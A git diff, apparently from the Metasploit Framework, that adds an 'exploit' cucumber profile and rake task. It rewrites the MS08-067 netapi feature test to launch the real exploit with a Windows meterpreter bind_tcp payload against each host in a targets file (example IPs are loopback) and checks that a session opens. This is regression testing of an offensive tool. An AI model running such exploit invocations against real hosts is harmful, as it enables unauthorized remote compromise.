diff --git a/config/cucumber.yml b/config/cucumber.yml index e3de143513..8cfb5f1a74 100644 --- a/config/cucumber.yml +++ b/config/cucumber.yml @@ -6,5 +6,6 @@ ignored_tags = "--tags ~@boot --tags ~@targets" %> default: <%= std_opts %> <%= ignored_tags %> features boot: <%= std_opts %> --tags @boot features +exploit: <%= std_opts %> --tags @targets features wip: --tags @wip:3 --wip features -rerun: <%= rerun_opts %> --format rerun --out rerun.txt --strict --tags ~@wip +rerun: <%= rerun_opts %> --format rerun --out rerun.txt --strict --tags ~@wip \ No newline at end of file diff --git a/features/modules/exploit/smb/ms08_067_netapi.feature b/features/modules/exploit/smb/ms08_067_netapi.feature index e23730be1c..9a9cf04ddf 100644 --- a/features/modules/exploit/smb/ms08_067_netapi.feature +++ b/features/modules/exploit/smb/ms08_067_netapi.feature @@ -1,181 +1,26 @@ -@wip +@targets Feature: MS08-067 netapi Background: Given a directory named "home" And I cd to "home" And a mocked home directory - Given I run `msfconsole` interactively - And I wait for stdout to contain "Free Metasploit Pro trial: http://r-7.co/trymsp" - Scenario: The MS08-067 Module should have the following options - When I type "use exploit/windows/smb/ms08_067_netapi" - And I type "show options" - And I type "exit" - Then the output should contain: + Scenario: The MS08-067 should get a session with bind_tcp + Given I ready the windows targets + And a file named "ms08-067.rc" with: """ - Module options (exploit/windows/smb/ms08_067_netapi): - - Name Current Setting Required Description - ---- --------------- -------- ----------- - RHOST yes The target address - RPORT 445 yes Set the SMB service port - SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC) - - - Exploit target: - - Id Name - -- ---- - 0 Automatic Targeting - + + hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml') + self.run_single('use exploit/windows/smb/ms08_067_netapi') + self.run_single('set payload windows/meterpreter/bind_tcp') + hosts['windows'].each do |host| + self.run_single("set RHOST #{host['ip']}") + self.run_single('run') + sleep 1 + end + + """ - - Scenario: The MS08-067 Module should have the following advanced options - When I type "use exploit/windows/smb/ms08_067_netapi" - And I type "show advanced" - And I type "exit" - Then the output should contain: - """ - Module advanced options: - - Name : CHOST - Current Setting: - Description : The local client address - - Name : CPORT - Current Setting: - Description : The local client port - - Name : ConnectTimeout - Current Setting: 10 - Description : Maximum number of seconds to establish a TCP connection - - Name : ContextInformationFile - Current Setting: - Description : The information file that contains context information - - Name : DCERPC::ReadTimeout - Current Setting: 10 - Description : The number of seconds to wait for DCERPC responses - - Name : DisablePayloadHandler - Current Setting: false - Description : Disable the handler code for the selected payload - - Name : EnableContextEncoding - Current Setting: false - Description : Use transient context when encoding payloads - - Name : NTLM::SendLM - Current Setting: true - Description : Always send the LANMAN response (except when NTLMv2_session is - specified) - - Name : NTLM::SendNTLM - Current Setting: true - Description : Activate the 'Negotiate NTLM key' flag, indicating the use of - NTLM responses - - Name : NTLM::SendSPN - Current Setting: true - Description : Send an avp of type SPN in the ntlmv2 client Blob, this allow - authentification on windows Seven/2008r2 when SPN is required - - Name : NTLM::UseLMKey - Current Setting: false - Description : Activate the 'Negotiate Lan Manager Key' flag, using the LM key - when the LM response is sent - - Name : NTLM::UseNTLM2_session - Current Setting: true - Description : Activate the 'Negotiate NTLM2 key' flag, forcing the use of a - NTLMv2_session - - Name : NTLM::UseNTLMv2 - Current Setting: true - Description : Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key - is true - - Name : Proxies - Current Setting: - Description : A proxy chain of format type:host:port[,type:host:port][...] - - Name : SMB::ChunkSize - Current Setting: 500 - Description : The chunk size for SMB segments, bigger values will increase - speed but break NT 4.0 and SMB signing - - Name : SMB::Native_LM - Current Setting: Windows 2000 5.0 - Description : The Native LM to send during authentication - - Name : SMB::Native_OS - Current Setting: Windows 2000 2195 - Description : The Native OS to send during authentication - - Name : SMB::VerifySignature - Current Setting: false - Description : Enforces client-side verification of server response signatures - - Name : SMBDirect - Current Setting: true - Description : The target port is a raw SMB service (not NetBIOS) - - Name : SMBDomain - Current Setting: . - Description : The Windows domain to use for authentication - - Name : SMBName - Current Setting: *SMBSERVER - Description : The NetBIOS hostname (required for port 139 connections) - - Name : SMBPass - Current Setting: - Description : The password for the specified username - - Name : SMBUser - Current Setting: - Description : The username to authenticate as - - Name : SSL - Current Setting: false - Description : Negotiate SSL for outgoing connections - - Name : SSLCipher - Current Setting: - Description : String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH" - - Name : SSLVerifyMode - Current Setting: PEER - Description : SSL verification method (Accepted: CLIENT_ONCE, - FAIL_IF_NO_PEER_CERT, NONE, PEER) - - Name : SSLVersion - Current Setting: SSL3 - Description : Specify the version of SSL that should be used (Accepted: SSL2, - SSL3, TLS1) - - Name : VERBOSE - Current Setting: false - Description : Enable detailed status messages - - Name : WORKSPACE - Current Setting: - Description : Specify the workspace for this module - - Name : WfsDelay - Current Setting: 0 - Description : Additional delay when waiting for a session - """ - - @targets - Scenario: Show RHOST/etc variable expansion from a config file - When I type "use exploit/windows/smb/ms08_067_netapi" - When RHOST is WINDOWS - And I type "set PAYLOAD windows/meterpreter/bind_tcp" - And I type "show options" - And I type "run" - And I type "exit" - And I type "exit" - Then the output should match /spider-wxp/ + When I run `msfconsole --environment test -q -r ms08-067.rc -x exit` + Then the output should contain "[*] Exploit completed, 1 session was created." diff --git a/features/support/targets.yml.example b/features/support/targets.yml.example index 75f4b9915d..0752a6cc7e 100644 --- a/features/support/targets.yml.example +++ b/features/support/targets.yml.example @@ -1,2 +1,7 @@ -WINDOWS: spider-wxp.vuln.lax.rapid7.com -LINUX: spider-ubuntu.vuln.lax.rapid7.com +windows: + - + hostname: wxpsp0 + ip: 127.0.0.100 + - + hostname: wxpsp2 + ip: 127.0.0.101 diff --git a/lib/tasks/custom_cucumber.rake b/lib/tasks/custom_cucumber.rake index 3dab9d0697..9b8c3fb8ae 100644 --- a/lib/tasks/custom_cucumber.rake +++ b/lib/tasks/custom_cucumber.rake @@ -12,6 +12,12 @@ begin t.fork = true # You may get faster startup if you set this to false t.profile = 'boot' end + Cucumber::Rake::Task.new({:exploit => 'db:test:prepare'}, 'Run features that should pass') do |t| + t.binary = vendored_cucumber_bin # If nil, the gem's binary is used. + t.fork = true # You may get faster startup if you set this to false + t.profile = 'exploit' + end + end rescue LoadError